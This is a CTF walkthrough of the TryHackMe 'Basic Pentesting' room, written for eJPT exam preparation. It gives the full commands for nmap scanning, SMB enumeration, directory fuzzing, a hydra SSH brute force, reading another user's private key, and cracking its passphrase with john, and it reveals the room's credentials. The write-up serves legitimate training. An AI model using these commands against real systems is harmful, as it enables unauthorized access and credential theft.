Summary

Basic Pentesting is the first machine in my Road to eJPTv2 series. It’s an excellent starting point because it covers several areas that appear on the exam: service enumeration (SMB, HTTP), directory fuzzing, SSH bruteforce, and SSH private key cracking. If you’re starting with TryHackMe and the eJPT, this machine is mandatory.

AttributeValue
PlatformTryHackMe
DifficultyEasy
OSLinux
RoomBasic Pentesting
SkillsSMB Enum, Web Fuzzing, SSH Bruteforce, SSH Key Cracking

Video version

If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.

Tools used

  • nmap — port and service enumeration
  • enum4linux — SMB enumeration
  • gobuster — web directory fuzzing
  • hydra — SSH bruteforce
  • ssh2john + john — SSH key hash extraction and cracking

Solution overview

  1. Nmap reveals SSH, HTTP, SMB ports and an additional service
  2. SMB enumeration with enum4linux reveals two users: jan and kay
  3. Web fuzzing with gobuster discovers a /development directory with hints
  4. SSH bruteforce with hydra against user jan obtains credentials
  5. Inside the system, we access kay’s id_rsa (root-equivalent user)
  6. The key is protected with a passphrase — cracked with john for final access

Reconnaissance

Connectivity check

ping -c 1 10.X.X.X

TTL=60 → target is Linux. This rules out typical Windows exploits like SMB EternalBlue and orients the strategy toward Unix service enumeration.

Nmap port scan

Initial sweep of all TCP ports:

nmap 10.X.X.X -n -Pn -sS -p- --min-rate=5000 -oG allTCPports

Flag justification:

  • -n skips DNS resolution, makes scan faster
  • -Pn assumes host is up, skips ping (some firewalls block ICMP)
  • -sS SYN scan — stealthy, doesn’t complete the TCP connection
  • --min-rate=5000 forces minimum speed of 5000 packets/sec
  • -oG greppable output, useful for piping ports to another scan

Once open ports identified, targeted scan with version detection and default scripts:

nmap 10.X.X.X -n -Pn -sS -sVC -p22,80,139,445,8009,8080 --min-rate=5000 -oN basicscan.txt

Key findings:

  • 22/tcp — OpenSSH (potential bruteforce vector)
  • 80/tcp — Apache (review content and fuzzing)
  • 139/445 tcp — SMB Samba (enumeration with enum4linux)
  • 8080/tcp — Apache Tomcat (potential admin login)

SMB enumeration with enum4linux

SMB is one of the most rewarding vectors on misconfigured Linux machines. Poorly protected users and shares often leak sensitive information.

enum4linux -a 10.X.X.X

Critical finding: two system users:

  • jan
  • kay

This changes the plan: now we have usernames, opening the door to targeted SSH bruteforce.

Web service enumeration

Before jumping to bruteforce, we check the web for plaintext credentials or hints.

whatweb

whatweb http://10.X.X.X

Identifies the stack: Apache + standard tech. Nothing flashy at first glance.

Fuzzing with gobuster

gobuster dir -u http://10.X.X.X \
  -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -t 50 -x php,txt,html

Finding: accessible /development directory.

Inside, we find dev.txt with a message signed by two people, J and K — matches the users found via SMB. The notes mention that J is using a weak password.

Reasoning: this is the classic “info the dev team leaves by mistake” pattern. The hint is clear: jan has a weak password → targeted SSH bruteforce.

Exploitation

Attack vector

With the previous findings, the plan is:

  1. SSH bruteforce against user jan with hydra and a common wordlist
  2. Once inside, pivot to kay (likely the user with more privileges, based on the document signature)

SSH bruteforce with Hydra

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.X.X.X -t 4

Flag justification:

  • -l jan single user (not -L which would be a user list)
  • -P rockyou.txt the most common wordlist for weak passwords
  • -t 4 4 parallel tasks (higher can cause SSH server lockouts)

Credentials obtained: jan:armando

Initial access via SSH

ssh jan@10.X.X.X

Now inside the system with jan’s limited permissions.

Post-exploitation

Identity and context

id
uname -a
hostname

uid=1001(jan) gid=1001(jan) groups=1001(jan)
Linux basic-pentesting 4.4.0-...

jan is a standard user without visible privileged groups. Time to enumerate the system looking for the path to kay or root.

System enumeration

Reviewing home directories and accessible files:

ls -la /home/
ls -la /home/kay/
ls -la /home/kay/.ssh/

Critical finding: kay’s .ssh folder has read permissions for other users, allowing us to read the id_rsa (SSH private key).

cat /home/kay/.ssh/id_rsa

I copy the full key to my attacking machine for processing.

Privilege escalation

Identified vector

kay’s private key is accessible, but it’s protected with a passphrase. If I can crack the passphrase, I’ll have direct SSH access as kay. This is lateral movement, but kay has elevated permissions that jan doesn’t (we’ll confirm this after).

Hash extraction with ssh2john

john can’t directly attack encrypted SSH keys; first we need to extract the hash in a format it understands:

ssh2john id_rsa > kay_hash

Cracking with John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt kay_hash

Passphrase obtained: beeswax

Final access as kay

chmod 600 id_rsa
ssh -i id_rsa kay@10.X.X.X

Entering the passphrase, we get a shell as kay.

Flag capture

cat /home/kay/pass.bak

Final flag: [contents of pass.bak]

Lessons learned

  • SMB is gold on Linux machines — enum4linux should be one of your first moves when ports 139/445 appear. The user list obtained changed the entire plan.
  • .txt file hints are intentional — In CTFs, files like dev.txt, notes.md, todo.txt always contain key info. Don’t skip them.
  • Misconfigured .ssh permissions — A private key readable by other users is a common vulnerability in poorly administered real-world environments. Always check /home/*/.ssh/.
  • SSH key passphrases are crackable — ssh2john + john is the standard combo. A weak passphrase completely defeats the protection of key encryption.

For the eJPT

This machine exercises skills directly evaluated on the eJPT:

  • Nmap enumeration (key syntax and flags)
  • SMB enumeration with enum4linux
  • Directory fuzzing with gobuster
  • Bruteforcing with hydra
  • Hash manipulation and cracking with john

Approximate solving time: 30-45 minutes for someone familiar with the tools.

References